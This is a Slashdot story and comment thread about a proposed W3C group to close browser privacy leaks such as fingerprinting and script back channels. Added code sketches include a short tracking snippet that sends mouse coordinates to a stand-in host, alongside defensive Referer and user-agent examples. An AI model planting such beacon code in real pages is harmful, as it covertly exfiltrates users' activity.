W3C Group Proposed To Safeguard User Agent State Privacy

First time accepted submitter FredAndrews writes "A Private User Agent W3C Community Group has been proposed to tackle the privacy of the web browser by developing technical solutions to close the leaks. Current JavaScript APIs can leak a great deal of information as we browse: details of our browser that can be used to identify and track our online presence, the content on the page (including any private customizations and the effects of extensions), and our usage of the page, such as mouse movements and other interactions. The problem is compounded by the increasing use of the web browser as a platform for delivering software. While the community ignores the issue, solutions are being developed commercially and patented; we run the risk of ending up unable to have privacy because the solutions are patented. The proposed W3C PUA CG aims to address the problem with technical solutions in the web browser, such as restricting the back channels available to JavaScript, and by proposing HTML extensions to mitigate lost functionality. Note that this work cannot address the privacy of information we overtly share; other current W3C initiatives, such as DNT, are working on that."
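
To make the leak concrete, here is a minimal TypeScript sketch (with a hypothetical tracker.example endpoint) of the kind of back channel the summary describes: ordinary page script watching mouse movement and shipping it out through an image request. Nothing exotic is required, which is exactly the group's concern.

    // Hypothetical illustration: page script exfiltrating mouse activity
    // through an ordinary image request. A real tracker would batch and
    // throttle; the point is that no special permission is needed.
    document.addEventListener("mousemove", (e: MouseEvent) => {
      const beacon = new Image();
      beacon.src =
        "https://tracker.example/log?x=" + e.clientX + "&y=" + e.clientY;
    });
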
Comments:
  • want to be private (Score:2, Insightful)

    by ozduo ( 2043408 ) on Saturday September 22, 2012 @08:33PM (#41424825)
    don't visit the internet
  • by Taco Cowboy ( 5327 ) on Saturday September 22, 2012 @08:40PM (#41424855) Journal

    The patent system was set up to encourage more people to invent new things, by protecting the interests of the inventor.

    It was never intended to restrict the rights of others to protect themselves.

    The use of patents in the solutions outlined in TFA is another clear-cut example of the abuse of the patent system.

    I do not know how much more the world must suffer before the powers that be wake up to the fact that the patent system is hopelessly broken.

    Overhaul the patent system now!

  • by Skapare ( 16644 ) on Saturday September 22, 2012 @09:37PM (#41425159) Homepage

    Browsers have had a lot of bad things done to them over the years, and these should simply be removed. Start with the Referer (regardless of spelling) header: if the destination domain is different, don't transmit it. Of course this only scratches the surface. When the user visits another domain, launch a whole new browser in a separate process. Also, do not expose data to a page's client-side code about things like navigation to other pages done in different tabs or windows. And when returning the view to a previously viewed page, just show the previous contents ... do NOT reload the page. The only time a page should be reloaded is when the user navigates to it via a link, presses reload, or the client code for that page requests reloading of itself or a page in the same directory.

    Yeah, these changes would break a lot of functionality that dumb web developers came to depend on. But these are things that never should have been there to begin with.
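
    As a rough illustration of the cross-domain Referer rule above, here is a minimal sketch written as a WebExtension header rewrite (assuming the browser.webRequest blocking API as in Firefox Manifest V2 extensions; it compares full hostnames, which a real implementation would refine to registrable domains):

        // Strip the Referer header whenever it points at a different host
        // than the request target. Sketch only: a production version would
        // compare registrable domains (eTLD+1), not raw hostnames.
        function hostOf(url: string): string {
          return new URL(url).hostname;
        }

        browser.webRequest.onBeforeSendHeaders.addListener(
          (details) => {
            const headers = details.requestHeaders ?? [];
            const referer = headers.find(
              (h) => h.name.toLowerCase() === "referer"
            );
            if (referer?.value && hostOf(referer.value) !== hostOf(details.url)) {
              // Cross-domain: drop the header entirely.
              return {
                requestHeaders: headers.filter(
                  (h) => h.name.toLowerCase() !== "referer"
                ),
              };
            }
            return { requestHeaders: headers };
          },
          { urls: ["<all_urls>"] },
          ["blocking", "requestHeaders"]
        );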

  • by Penurious Penguin ( 2687307 ) on Saturday September 22, 2012 @10:00PM (#41425259) Journal
    First, http://www.techdirt.com/articles/20120920/23570020453/when-even-hilarious-web-comic-artists-are-mocking-insanity-patent-system.shtml [techdirt.com]

    Admitting my primitive understanding of this subject, I have some questions: Is sandboxing undervalued? Is sending all cache to unique directories, readable only by the source that created them, practical? Would generating random or shared generic user-agent data for each domain, on each encounter, have any effect? (See the first sketch after this comment.) I have taken simple privacy measures like chmod 400 ~/.macromedia and ~/.adobe; installing NoScript and Flashblock; bloating /etc/hosts with loopback redirects; thrashing around in about:config; piously using BleachBit; etc. But I guess there are still KISSmetrics and other mysterious things to deal with.

    I remember trying the EFF's Panopticlick [eff.org], which tests your browser for its unique fingerprint. I was a little surprised at the results. What does something like the timestamp mean for anonymity? How many people in the world have identical installation times, zip codes, etc.? Why does this and other data need to be there at all? (Some arithmetic on fingerprint entropy follows this comment.)

    I get confused when contemplating why such promiscuous features are included in browsers in the first place. Are we simply using stupid browsers? Would creating a secure browser break its functionality? I know NoScript can be a pain in the ass. What really confuses me is why a browser would store persistent cookies and other data -- after being deleted -- unless it was built to do so. If so, then why? If not, then why? When I start a browser from a fresh install or USB, it works just fine. If I reboot and do it again, it continues to work fine. Why the persistent data?

    Finally, it should be alarming in itself that so much knowledge is now required to have even a measure of privacy. Those who understand often take their knowledge for granted. But even for someone practically living and working on the web, it is not a simple subject. Is privacy an esoteric delusion, or is it an esoteric reality?
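
    On the per-domain user-agent question above, one conceivable approach (a sketch only; the strings and helper names are invented for illustration) is to derive a generic UA deterministically from the domain, so each site always sees the same uninformative value while different sites cannot correlate it:

        // Map each domain onto one of a few generic user-agent strings.
        // Deterministic per domain: a site sees a stable value, but the
        // value carries no real browser details and differs across sites.
        const genericUAs = [
          "Mozilla/5.0 (generic; HTML 4.01)",
          "Mozilla/5.0 (generic; HTML5)",
        ];

        // djb2-style string hash, kept in unsigned 32-bit range.
        function hash(s: string): number {
          let h = 5381;
          for (const c of s) h = ((h * 33) ^ c.charCodeAt(0)) >>> 0;
          return h;
        }

        function uaFor(domain: string): string {
          return genericUAs[hash(domain) % genericUAs.length];
        }

        console.log(uaFor("example.com")); // stable per domain, generic content

    And for scale on the Panopticlick results: fingerprint tests measure identifying information in bits of surprisal. A trait shared by a fraction p of browsers contributes -log2(p) bits, and roughly independent traits add up; about 33 bits are enough to single out one person among seven billion. The figures below are illustrative, not Panopticlick's actual numbers:

        // Back-of-envelope surprisal arithmetic. A trait seen in a fraction
        // p of browsers contributes -log2(p) bits of identifying information.
        const bits = (p: number): number => -Math.log2(p);

        const traits = {
          userAgent: bits(1 / 1500), // an uncommon UA string
          timezone: bits(1 / 20),    // one of ~20 common offsets
          screen: bits(1 / 100),     // resolution + color depth
          fonts: bits(1 / 5000),     // installed-font list
        };

        const total = Object.values(traits).reduce((a, b) => a + b, 0);
        console.log(`~${total.toFixed(1)} bits`); // ~33.8 with these figures
        // log2(7e9) is about 32.7 bits: enough to identify one person on Earth.
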
  • by flimflammer ( 956759 ) on Sunday September 23, 2012 @01:10AM (#41426011)

    Who the hell cares who wrote the book at that point? Some people seriously don't think about the consequences of a no-copyright, no-patent environment. If there were absolutely no copyright or patents, the moment someone low in the food chain came up with something, he couldn't do anything with it without risking losing it forever. What the hell incentive does he have to do anything with it? What the hell reason does anyone have to invest in R&D when someone can just jump in, take the final result, and run with it? Do you think we as a people will seriously go "Well, they came up with it first, so I'm going to buy their product" when the competitor is offering the same thing at a drastically lower price, since they don't have the cost of the past R&D to recover?

    Yes, patents are abused and the system is currently absurd. Yes, copyright is abused and the system is currently absurd. (90+ year terms? Come on now.) But removing the systems completely instead of fixing them makes no goddamn sense.

  • by jd ( 1658 ) <(imipak) (at) (yahoo.com)> on Sunday September 23, 2012 @01:49AM (#41426197) Homepage Journal

    The browser string helps to identify whether the browser can perform certain functions. So send a string that specifies "server-visible capabilities" (i.e., what the user wants the server to know about the capabilities of the browser) instead. Then no browser, OS, or other potential privacy loopholes exist.

    But what if you don't want the server to know anything? That's the point about sending a capabilities string. If you don't want to specify, there's no need to. Having said that, setting a bit that indicates "HTML 4.01-compliant" is not revealing anything terribly informative to anyone, since that's going to be true of 99% of user agents at this point. Which means you're not part of the 1%, but that's about it.

    HTML 5 is the only awkward one, as you'd have to have a bit for some generally agreed group of functions, since there's no fixed standard. (IIRC, that's going to switch to having a "rolling development branch" and fixed "stable snapshots", but for now there's no stable spec you can identify with a simple flag.)

    True, some browsers implement subsets of (and/or extensions to) approved standards, but frankly, supporting those kinds of freaks is the developers' headache. A fixed list of supported standards you can switch between is really what you want. Special cases for every browser make for something unmaintainable, as anyone who has developed a web app can tell you. Freak cases really should be reduced to the nearest available standard where at all possible.

    This satisfies all the requirements of the server, for behaving correctly on multiple browsers, without giving anything away that could be misused.

    Furthermore, since I'm saying the capabilities string is a bunch of flags, you can specify masks per site or site grouping if you want to conceal some information from some servers. (This makes user tracking via the agent impossible, since the agent can now vary and there's fine-grained control over how it varies.) Not a million miles from how security is handled in every other case.
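
    A minimal sketch of that flags-and-masks scheme (all names invented for illustration; real capability sets would be standardized):

        // Capabilities as bit flags; each site gets a mask controlling
        // which bits it may learn. Hypothetical names throughout.
        enum Cap {
          Html401   = 1 << 0,
          Css21     = 1 << 1,
          SvgBasic  = 1 << 2,
          Html5Core = 1 << 3, // some agreed-upon HTML5 snapshot
        }

        const browserCaps = Cap.Html401 | Cap.Css21 | Cap.SvgBasic | Cap.Html5Core;

        // Per-site masks: what each origin is allowed to learn.
        const siteMasks: Record<string, number> = {
          "example.com": Cap.Html401 | Cap.Html5Core, // trusted web app
          "*": Cap.Html401,                           // everyone else: bare minimum
        };

        function capsFor(host: string): number {
          return browserCaps & (siteMasks[host] ?? siteMasks["*"]);
        }

        // What would be sent in place of a User-Agent string:
        console.log(capsFor("example.com").toString(2)); // "1001"
        console.log(capsFor("tracker.net").toString(2)); // "1"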

  • by Decker-Mage ( 782424 ) <brian.bartlett@gmail.com> on Sunday September 23, 2012 @04:30AM (#41426659)
    Actually, it's being demonstrated all the time: authors with freely downloadable books online find that people pay for them anyway, to support their favorite authors. Toss in Kickstarter and the like, music groups similarly getting paid for limited performances, etc. It's been shown time and again that the gatekeepers are exactly that: people supposedly with the knowledge to select the anointed, and we pay for the privilege of supporting them in that role. Well, it isn't the Middle Ages, nor the industrial age. It's the information age, and I demonstrate, as do many others, that I'm willing to pay to support my entertainers.
